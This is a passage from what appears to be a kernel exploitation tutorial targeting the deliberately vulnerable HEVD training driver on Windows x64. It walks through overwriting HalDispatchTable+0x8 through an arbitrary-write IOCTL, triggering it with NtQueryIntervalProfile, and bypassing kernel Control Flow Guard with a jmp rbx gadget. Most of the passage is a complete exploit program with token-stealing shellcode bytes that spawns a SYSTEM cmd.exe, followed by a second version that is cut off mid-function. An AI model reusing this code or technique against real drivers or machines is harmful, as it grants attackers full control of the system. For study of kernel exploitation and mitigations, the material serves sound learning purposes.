    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

ResolveHalDispatchTable() is a small wrapper around the generic export resolver.

The generic function can resolve any exported kernel symbol:

  
ResolveKernelExport(hDevice, ntBase, "SomeExportedSymbol")

But in this exploit, we specifically care about:

HalDispatchTable

So this wrapper calls:

  
ResolveKernelExport(
    hDevice,
    ntBase,
    "HalDispatchTable"
);

If the dynamic resolution succeeds, the function returns the live kernel address of HalDispatchTable.

That is the ideal path:

Live ntoskrnl base
    |
    v
Parse live PE export table
    |
    v
Find "HalDispatchTable"
    |
    v
Return live nt!HalDispatchTable

If the export parsing fails, the code falls back to the WinDBG-derived offset:

  
halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

On my test machine, WinDBG gave:

? nt!HalDispatchTable - nt = 0xC00A60

So the fallback is:

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL

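This gives the exploit two ways to find the table: a dynamic lookup that adapts to whatever kernel is loaded, and a known offset for the build I tested. Keep in mind that the fallback offset is specific to that build. On a different kernel build it has to be recalculated, otherwise the write lands on the wrong address.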

The dynamic method is nicer because it does not require hardcoding the offset. It reads the actual loaded kernel image and resolves the symbol from its export directory.

The fallback is useful because not every symbol is guaranteed to be exported on every build, and exploit development is already enough pain without letting one missing export ruin the entire afternoon.

After this function returns, the exploit calculates the actual target entry:

  
halDispatchEntry = halDispatchTable + 0x8;

On x64, function pointers are 8 bytes. That is why this exploit uses:

HalDispatchTable + 0x8

instead of the older x86-style:

HalDispatchTable + 0x4

So the final target becomes:

nt!HalDispatchTable + 0x8

In my run, WinDBG showed:

HalDispatchTable:       fffff802`10e00a60
HalDispatchTable + 0x8: fffff802`10e00a68

That is the address the arbitrary write overwrites with the shellcode pointer. Remember, I asked for this headache and pain. The same result could easily be achieved with the LoadLibrary and GetProcAddress APIs against a user mode copy of the kernel image. At this point, I basically wrote a very tiny, very cursed GetProcAddress() that works against the live kernel image instead of a user mode mapped copy. Microsoft gave us PE headers, and I gave myself another reason to hate offsets.
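
Why the second slot? As far as I know, the table starts with a version field, and the first function pointer (HalQuerySystemInformation, the one KeQueryIntervalProfile ends up calling) comes right after it. The sketch below is a simplified, assumed mirror of the first few fields on x64, with pointers modelled as 64-bit integers so the layout is the same on any host. The type and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified, assumed mirror of the start of HalDispatchTable on x64. */
typedef struct {
    uint32_t Version;                    /* +0x00 */
    uint32_t Padding;                    /* +0x04, alignment padding made explicit */
    uint64_t HalQuerySystemInformation;  /* +0x08, the slot this exploit targets */
    uint64_t HalSetSystemInformation;    /* +0x10 */
} hal_dispatch_prefix_t;

/* Address of the targeted slot, given the table address. */
static uint64_t hal_entry_address(uint64_t table)
{
    return table + offsetof(hal_dispatch_prefix_t, HalQuerySystemInformation);
}
```

Feeding in the table address from my run, fffff802`10e00a60, gives fffff802`10e00a68, which matches the output above.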

Ringing the NtQueryIntervalProfile Doorbell

After overwriting HalDispatchTable + 0x8, the next problem is simple: we need to make Windows actually use that function pointer.

We do not call HalDispatchTable directly from user mode. It lives in kernel memory, and user mode cannot just call into it like a normal function. Instead, we trigger a legitimate Windows syscall path that eventually reaches it.

That syscall is:

NtQueryIntervalProfile

The setup starts with this typedef:

  
typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
);

NtQueryIntervalProfile returns an NTSTATUS, so we define NTSTATUS as a LONG. Then we define a function-pointer type named NtQueryIntervalProfile_t.

The function takes two arguments:

  
ULONG ProfileSource
PULONG Interval

ProfileSource tells Windows what kind of profiling interval information we are asking for. Interval is an output pointer where Windows can place the result.

For this exploit, we do not really care about the returned interval value. We only care that calling this API makes the kernel walk into the code path that uses HalDispatchTable.

The code resolves the function dynamically from ntdll.dll:

  
HMODULE ntdll = GetModuleHandleA("ntdll.dll");

ntdll.dll is already loaded into normal Windows processes. It contains the user mode syscall stubs for Native APIs like NtQueryIntervalProfile.

Then the code gets the address of the exported function:

  
NtQueryIntervalProfile_t NtQueryIntervalProfile =
    (NtQueryIntervalProfile_t)GetProcAddress(
        ntdll,
        "NtQueryIntervalProfile"
    );

This gives the exploit a callable user mode function pointer.

At this point, the important setup has already happened:

HalDispatchTable + 0x8 -> shellcodeAddress

So when the exploit calls:

  
ULONG interval = 0;

NTSTATUS status = NtQueryIntervalProfile(
    ProfileTotalIssues,
    &interval
);

the flow becomes:

User mode
    |
    | NtQueryIntervalProfile(ProfileTotalIssues, &interval)
    v
ntdll syscall stub
    |
    v
Kernel mode
    |
    v
nt!NtQueryIntervalProfile
    |
    v
nt!KeQueryIntervalProfile
    |
    v
Indirect call through HalDispatchTable + 0x8

In the classic technique, that final indirect call is the whole point.

Normally, HalDispatchTable + 0x8 points to a legitimate HAL routine. But after our arbitrary write, it points to our payload instead. So when the kernel reaches that call, execution is redirected to the address we placed inside the table.

So the exploit sequence is:

Allocate shellcode
Resolve HalDispatchTable
Save the original HalDispatchTable + 0x8 value
Overwrite HalDispatchTable + 0x8 with shellcodeAddress
Call NtQueryIntervalProfile
Kernel reaches the overwritten HAL entry
Payload executes
Restore the original HAL entry
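
The part of this sequence that is easiest to get wrong is the bookkeeping: save first, restore last. As a harmless illustration of just that ordering, here is the same pattern applied to an ordinary function pointer table in user mode. Everything in it (table, original_routine, replacement_routine, call_with_temporary_hook) is hypothetical and has nothing to do with the real HAL table.

```c
/* Type of the routines stored in the mock table. */
typedef int (*slot_fn)(void);

static int original_routine(void)
{
    return 1;
}

static int replacement_routine(void)
{
    return 2;
}

/* Mock dispatch table: slot 0 is unused, slot 1 holds the routine. */
static slot_fn table[2] = { 0, original_routine };

/* Save the slot, swap it, call through it, then put the original back. */
static int call_with_temporary_hook(void)
{
    slot_fn saved = table[1];           /* save the original entry */
    int result;

    table[1] = replacement_routine;     /* overwrite the entry */
    result = table[1]();                /* trigger the indirect call */
    table[1] = saved;                   /* restore the original entry */

    return result;
}
```

After the call returns, the table points at original_routine again, so any later caller that goes through the slot behaves as if nothing had happened. In the kernel case, skipping the restore step means the next legitimate caller jumps into freed or user mode memory.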

Finale

The final code becomes this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

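    // cbNeeded may report more bytes than the array can hold,
    // so clamp the count to the number of slots actually available.
    int driverCount = (int)(cbNeeded / sizeof(drivers[0]));

    if (driverCount > (int)(sizeof(drivers) / sizeof(drivers[0])))
    {
        driverCount = (int)(sizeof(drivers) / sizeof(drivers[0]));
    }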

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

    halDispatchTable = ResolveHalDispatchTable(hDevice, ntBase);

    if (!halDispatchTable)
    {
        printf("[-] Failed to resolve HalDispatchTable\n");
        goto cleanup;
    }

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        (QWORD)(ULONG_PTR)shellcodeAddress
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != (QWORD)(ULONG_PTR)shellcodeAddress)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

    printf("[+] Triggering NtQueryIntervalProfile...\n");

    interval = 0;

    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        &interval
    );

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

I tried to make it look as pretty as I could using AI, but it is still a lot of code.

The Crash

But guess what? The exploit didn’t work. The VM crashed. Why? Because of something called Kernel Control Flow Guard.

WinDBG shows this

0x139_0_LEGACY_GS_VIOLATION_nt!guard_icall_bugcheck

Remember, at this point we are working with a VM that has SMEP disabled, yet kCFG still blocks our execution.

Enter Kernel Control Flow Guard

At this point, the classic HalDispatchTable technique looked like it should work.

The exploit successfully resolved HalDispatchTable, calculated the target entry at HalDispatchTable + 0x8, saved the original value, overwrote the entry with the shellcode address, and triggered the path using NtQueryIntervalProfile.

In old school exploit logic, this should have been the money shot:

NtQueryIntervalProfile
        |
        v
nt!NtQueryIntervalProfile
        |
        v
nt!KeQueryIntervalProfile
        |
        v
call qword ptr [HalDispatchTable + 0x8]
        |
        v
shellcode

But modern Windows had other plans.

Instead of jumping to the shellcode, the machine crashed with:

KERNEL_SECURITY_CHECK_FAILURE (139)

The interesting part was not just the bugcheck code. The important clue was this:

nt!guard_icall_bugcheck

That tells us the crash happened because a guarded indirect call failed validation.

This is where Kernel Control Flow Guard, or KCFG, enters the picture.

Control Flow Guard is a mitigation designed to stop attackers from abusing indirect calls. An indirect call is a call where the destination is not hardcoded directly into the instruction. Instead, the CPU gets the destination from a register or memory location.

For example:

call rax

or:

  
call qword ptr [some_table_entry]

That second style is exactly what makes dispatch tables interesting to exploit developers. If a kernel table contains a function pointer, and an attacker can overwrite that pointer, then the next indirect call through the table can become a control flow hijack.
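To make the dispatch table idea concrete, here is a minimal user-mode sketch. Nothing in it is real kernel code: dispatch_table, query_handler and attacker_code are hypothetical names I made up for illustration, and the table stands in for something like HalDispatchTable.

```c
/* Function pointer type for entries in the (hypothetical) dispatch table. */
typedef int (*handler_fn)(int);

/* The legitimate handler the table is supposed to point at. */
static int query_handler(int x) { return x + 1; }

/* Stand-in for attacker-controlled code. */
static int attacker_code(int x) { (void)x; return 1337; }

/* A writable table of function pointers, like a kernel dispatch table. */
static handler_fn dispatch_table[2] = { query_handler, query_handler };

/* Compiles down to an indirect call: call qword ptr [table + index * 8]. */
static int call_through_table(int index, int arg)
{
    return dispatch_table[index](arg);
}
```

If something overwrites dispatch_table[1] with attacker_code, the next call_through_table(1, ...) runs the attacker's function even though the calling code never changed. That is the whole trick, minus the kernel.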

That is the entire idea behind the classic HalDispatchTable technique. But KCFG changes the rules.

Instead of blindly trusting the function pointer, the kernel checks whether the indirect call target is valid before allowing execution to continue. If the target is not considered a valid kernel control flow destination, Windows does not call it. It bugchecks.

That is exactly what happened here. Our overwritten table entry pointed to user mode shellcode:

HalDispatchTable + 0x8 -> 000001ec`70f60000

With SMEP disabled, the CPU itself would not block kernel execution from a user page. So from a pure SMEP perspective, this looked fine. But KCFG is a different mitigation.

SMEP asks:

Is kernel mode trying to execute code from a user mode page?

KCFG asks:

Is this indirect call target a valid destination for this guarded kernel call?

Our shellcode address failed that second question. So even though SMEP was off, the kernel still refused to transfer execution to the payload. The crash happened before the shellcode had a chance to run. This distinction is important:

SMEP blocks execution based on page privilege.
KCFG blocks execution based on control flow validity.
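A rough way to picture why the shellcode address fails the KCFG question even with SMEP off is the sketch below. It rests on an assumption that is not shown in this post: that on a machine without VBS/HVCI the guarded-call check boils down to roughly "is the target a kernel-space address". The function name is hypothetical and this is a simplified model, not the actual nt!guard_dispatch_icall logic.

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified model (assumption): a target is only plausible for a guarded
   kernel call if it lies in the upper, kernel half of the address space. */
static bool kcfg_target_plausible(uint64_t target)
{
    return (target >> 63) != 0;
}
```

With the values from this post, the user-mode shellcode address 0x000001ec70f60000 fails this check, while a gadget inside ntoskrnl.exe such as 0xfffff80251c4584a passes it.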

Bypassing KCFG: Stop Pointing HAL Directly at Shellcode

Instead of writing the user-mode shellcode address directly into HalDispatchTable + 0x8, we write the address of a kernel gadget. In this case, the gadget is jmp rbx. When NtQueryIntervalProfile reaches the guarded HAL dispatch call, kCFG sees a target inside ntoskrnl.exe rather than a user-mode shellcode page, so the check passes. The gadget then performs the second hop into our shellcode through RBX, which holds the shellcode address because the exploit passes it as the Interval argument. In short, the kernel validates the gadget address instead of our shellcode address, and kCFG won’t cry about it. This is already implemented here as well.

Recall that we can search for gadgets with ropper and hardcode the offset in our code. But obviously I wanted to make it all dynamic. The only part of the code worth explaining is that I’m reusing the read primitive to scan for the opcode bytes FF E3, which encode the jmp rbx gadget we are looking for.
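The byte search itself is simple. Here is a minimal sketch that works on a local buffer instead of kernel memory; find_jmp_rbx is a hypothetical helper name, not something from the exploit code.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first FF E3 byte pair (jmp rbx) in buf,
   or -1 if the pattern does not occur. */
static long find_jmp_rbx(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xFF && buf[i + 1] == 0xE3)
            return (long)i;
    }
    return -1;
}
```

The two bytes do not have to be an instruction the compiler intended. Any FF E3 pair in an executable section decodes as jmp rbx when execution starts at that offset.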

The entire code that bypasses kCFG becomes this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

#define IMAGE_SCN_MEM_EXECUTE 0x20000000
#define JMP_RBX_BYTE_1 0xFF
#define JMP_RBX_BYTE_2 0xE3

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
